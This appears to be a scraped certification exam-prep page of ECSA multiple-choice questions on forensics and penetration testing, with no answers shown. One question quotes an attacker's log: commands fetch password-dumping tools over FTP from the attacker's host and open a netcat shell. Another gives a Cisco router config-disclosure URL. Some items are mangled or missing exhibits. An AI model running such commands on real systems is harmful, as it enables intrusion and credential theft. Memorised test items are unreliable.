New Year Special Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: mxmas70

Home > ECCouncil > ECSA > 412-79

412-79 EC-Council Certified Security Analyst (ECSA) Question and Answers

Question # 4

When investigating a Windows System, it is important to view the contents of the page or swap file because:

A.

Windows stores all of the systems configuration information in this file

B.

This is file that windows use to communicate directly with Registry

C.

A Large volume of data can exist within the swap file of which the computer user has no knowledge

D.

This is the file that windows use to store the history of the last 100 commands that were run from the command line

Full Access
Question # 5

An Expert witness give an opinion if:

A.

The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

B.

To define the issues of the case for determination by the finder of fact

C.

To stimulate discussion between the consulting expert and the expert witness

D.

To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case

Full Access
Question # 6

Diskcopy is:

A.

a utility byAccessData

B.

a standard MS-DOS command

C.

Digital Intelligence utility

D.

dd copying tool

Full Access
Question # 7

Printing under a Windows Computer normally requires which one of the following files types to be created?

A.

EME

B.

MEM

C.

EMF

D.

CME

Full Access
Question # 8

You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the firms employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will.

What do you do?

A.

Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned

B.

Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment

C.

Inform the owner that conducting an investigation without a policy is a violation of the employees expectation of privacy

D.

Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies

Full Access
Question # 9

After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a lage organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts responds to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?

A.

A switched network will not respond to packets sent to the broadcast address

B.

Only IBM AS/400 will reply to this scan

C.

Only Unix and Unix-like systems will reply to this scan

D.

Only Windows systems will reply to this scan

Full Access
Question # 10

You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's network. How would you answer?

A.

IBM Methodology

B.

LPT Methodology

C.

Google Methodology

D.

Microsoft Methodology

Full Access
Question # 11

Click on the Exhibit Button

Paulette works for an IT security consulting company that is currently performing an audit for the firm ACE Unlimited. Paulette's duties include logging on to all the company's network equipment to ensure IOS versions are up-to-date and all the other security settings are as stringent as possible. Paulette presents the following screenshot to her boss so he can inform the client about necessary changes need to be made. From the screenshot, what changes should the client company make?

Exhibit:

A.

The banner should not state "only authorized IT personnel may proceed"

B.

Remove any identifying numbers, names, or version information

C.

The banner should have more detail on the version numbers for the network equipment

D.

The banner should include the Cisco tech support contact information as well

Full Access
Question # 12

At what layer of the OSI model do routers function on?

A.

5

B.

1

C.

4

D.

3

Full Access
Question # 13

John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found.

What information will he be able to gather from this?

A.

The SAM file from Hillary computer

B.

Hillary network username and password hash

C.

The SID of Hillary network account

D.

The network shares that Hillary has permissions

Full Access
Question # 14

In Linux, what is the smallest possible shellcode?

A.

800 bytes

B.

8 bytes

C.

80 bytes

D.

24 bytes

Full Access
Question # 15

You are a security analyst performing a penetration tests for a company in the Midwest. After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers:

http://172.168.4.131/level/99/exec/show/config

After typing in this URL, you are presented with the entire configuration file for that router. What have you discovered?

A.

URL Obfuscation Arbitrary Administrative Access Vulnerability

B.

Cisco IOS Arbitrary Administrative Access Online Vulnerability

C.

HTTP Configuration Arbitrary Administrative Access Vulnerability

D.

HTML Configuration Arbitrary Administrative Access Vulnerability

Full Access
Question # 16

Why is it a good idea to perform a penetration test from the inside?

A.

It is easier to hack from the inside

B.

It is never a good idea to perform a penetration test from the inside

C.

To attack a network from a hacker's perspective

D.

Because 70% of attacks are from inside the organization

Full Access
Question # 17

You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information?

A.

RaidSniff

B.

Snort

C.

Ettercap

D.

Airsnort

Full Access
Question # 18

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold? needs?

A.

Application-level proxy firewall

B.

Data link layer firewall

C.

Packet filtering firewall

D.

Circuit-level proxy firewall

Full Access
Question # 19

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.

Windows computers are constantly talking

B.

Linux/Unix computers are constantly talking

C.

Linux/Unix computers are easier to compromise

D.

Windows computers will not respond to idle scans

Full Access
Question # 20

What is a good security method to prevent unauthorized users from "tailgating"?

A.

Electronic key systems

B.

Man trap

C.

Pick-resistant locks

D.

Electronic combination locks

Full Access
Question # 21

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal:

What have you found?

A.

Trojan.downloader

B.

Blind bug

C.

Web bug

D.

CGI code

Full Access
Question # 22

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.

Windows computers will not respond to idle scans

B.

Linux/Unix computers are constantly talking

C.

Linux/Unix computers are easier to compromise

D.

Windows computers are constantly talking

Full Access
Question # 23

Which is a standard procedure to perform during all computer forensics investigations?

A.

with the hard drive removed from the suspect PC, check the date and time in the system‟s CMOS

B.

with the hard drive in the suspect PC, check the date and time in the File Allocation Table

C.

with the hard drive removed from the suspect PC, check the date an d time in the system‟s RAM

D.

with the hard drive in the suspect PC, check the date and time in the system‟s CMOS

Full Access
Question # 24

A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloadeD. What can the investigator do to prove the violation? Choose the most feasible option.

A.

Image the disk and try to recover deleted files

B.

Seek the help of co-workers who are eye-witnesses

C.

Check the Windows registry for connection data (You may or may not recover)

D.

Approach the websites for evidence

Full Access
Question # 25

What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System?

A.

Encryption of agent communications will conceal the presence of the agents

B.

Alerts are sent to the monitor when a potential intrusion is detected

C.

An intruder could intercept and delete data or alerts and the intrusion can go undetected

D.

The monitor will know if counterfeit messages are being generated because they will not be encrypted

Full Access
Question # 26

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 >ftpcom”

“cmd1.exe /c echo johna2k >>ftpcom”

“cmd1.exe /c echo

haxedj00 >>ftpcom”

“cmd1.exe /c echo get n

C.

exe >>ftpcom”

“cmd1.exe /c echo get pdump.exe >>ftpcom”

“cmd1.exe /c echo get samdump.dll >>ftpcom”

“cmd1.exe /c echo quit >>ftpcom”

“cmd1.exe /c ftp-

s:ftpcom”

“cmd1.exe /c nc

-l -p 6969 -

e cmd1.exe”

What can you infer from the exploit given?

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system -johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Full Access
Question # 27

It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner?

A.

by law, three

B.

quite a few

C.

only one

D.

at least two

Full Access
Question # 28

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

A.

evidence must be handled in the same way regardless of the type of case

B.

evidence procedures are not important unless you work for a law enforcement agency

C.

evidence in a criminal case must be secured more tightly than in a civil case

D.

evidence in a civil case must be secured more tightly than in a criminal case

Full Access
Question # 29

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?

A.

All forms should be placed in an approved secure container because they are now primary evidence in the case.

B.

The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.

C.

The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.

D.

All forms should be placed in the report file because they are now primary evidence in the case.

Full Access
Question # 30

Which of the following filesystem is used by Mac OS X?

A.

EFS

B.

HFS+

C.

EXT2

D.

NFS

Full Access
Question # 31

Law enforcement officers are conducting a legal search for which a valid warrant was obtaineD. While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible?

A.

Plain view doctrine

B.

Corpus delicti

C.

Locard Exchange Principle

D.

Ex Parte Order

Full Access
Question # 32

You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a porno graphic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?

A.

ARP Poisoning

B.

DNS Poisoning

C.

HTTP redirect attack

D.

IP Spoofing

Full Access
Question # 33

Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?

A.

network-based IDS systems (NIDS)

B.

host-based IDS systems (HIDS)

C.

anomaly detection

D.

signature recognition

Full Access
Question # 34

You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer laB. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a simple backup copy of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You inform him that a simple backup copy will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?

A.

Bit-stream Copy

B.

Robust Copy

C.

Full backup Copy

D.

Incremental Backup Copy

Full Access